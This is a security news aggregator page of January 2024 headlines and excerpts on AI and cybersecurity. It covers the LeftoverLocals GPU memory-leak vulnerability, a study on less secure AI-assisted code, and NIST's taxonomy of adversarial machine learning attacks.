Security News

Attackers Could Eavesdrop on AI Conversations on Apple, AMD, Imagination and Qualcomm GPUs
2024-01-18 19:00

Researchers at cybersecurity research and consulting firm Trail of Bits have discovered a vulnerability that could allow attackers to read GPU local memory from affected Apple, Qualcomm, AMD and Imagination GPUs. In particular, the vulnerability-which the researchers named LeftoverLocals-can access conversations performed with large language models and machine learning models on affected GPUs.

Attackers Could Eavesdrop on AI Conversations on Apple, AMD, Imagination and Qualcomm GPUs
2024-01-18 19:00

Researchers at cybersecurity research and consulting firm Trail of Bits have discovered a vulnerability that could allow attackers to read GPU local memory from affected Apple, Qualcomm, AMD and Imagination GPUs. In particular, the vulnerability-which the researchers named LeftoverLocals-can access conversations performed with large language models and machine learning models on affected GPUs.

The power of AI in cybersecurity
2024-01-18 04:30

Besides helping security teams perform these tasks more accurately, AI also helps them improve their working speed. Speed is also what cybercriminals are achieving when harnessing the power of AI: it allows them to quickly adapt their attacks to new security measures.

Apple, AMD, Qualcomm GPU security hole lets miscreants snoop on AI training and chats
2024-01-17 23:21

Research made public on Tuesday detailed how miscreants can exploit the hole to read data they're not supposed to in a system's local GPU memory. While the flaw potentially affects all GPU applications on vulnerable chips, it is especially concerning for those processing machine-learning applications because of the amount of data these models process using GPUs, and therefore the amount of potentially sensitive information that could be swiped by exploiting this issue.

AMD, Apple, Qualcomm GPUs leak AI data in LeftoverLocals attacks
2024-01-17 15:32

A new vulnerability dubbed 'LeftoverLocals' affecting graphics processing units from AMD, Apple, Qualcomm, and Imagination Technologies allows retrieving data from the local memory space. [...]

This Free Discovery Tool Finds and Mitigates AI-SaaS Risks
2024-01-17 13:30

Wing Security announced today that it now offers free discovery and a paid tier for automated control over thousands of AI and AI-powered SaaS applications. This will allow companies to better...

Code Written with AI Assistants Is Less Secure
2024-01-17 12:14

"At least, that's true today, with today's programmers using today's AI assistants." "Overall, we find that participants who had access to an AI assistant based on OpenAI's codex-davinci-002 model wrote significantly less secure code than those without access."

#AI
The Dual Role AI Plays in Cybersecurity: How to Stay Ahead
2024-01-16 15:02

According to a survey, 33 percent of organizations are currently leveraging generative AI in at least one business function. Cybersecurity is also a key area where AI is being used, with 51 percent of business owners planning to enhance their cybersecurity efforts using this technology.

LLM hype fades as enterprises embrace targeted AI models
2024-01-12 04:00

The failure of LLMs to live up to their hype will be the story of 2024, as generic models become relegated to consumer-centric applications and enterprise users turn to smaller, more targeted AI models, purpose-built to meet their business needs. Recognizing the value of the data they hold, companies will seek to secure it by taking a "Hybrid cloud by design" approach, rather than "Hybrid cloud by default." Ultimately, data protection will emerge as a key pillar in a successful AI strategy, and companies will move towards prioritizing AI solutions that are trustworthy and responsible.

#AI
Securing AI systems against evasion, poisoning, and abuse
2024-01-09 04:30

The publication, "Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations," is a key component of NIST's broader initiative to foster the creation of reliable AI. This effort aims to facilitate the implementation of NIST's AI Risk Management Framework and aims to assist AI developers and users in understanding potential attacks and strategies to counter them, acknowledging that there is no silver bullet. "The risks of AI are as significant as the potential benefits. The latest publication from NIST is a great start to explore and categorize attacks against AI systems. It defines a formal taxonomy and provides a good set of attack classes. It does miss a few areas, such as misuse of the tools to cause harm, abuse of inherited trust by people believing AI is an authority, and the ability to de-identify people and derive sensitive data through aggregated analysis," Matthew Rosenquist, CISO at Eclipz.io commented.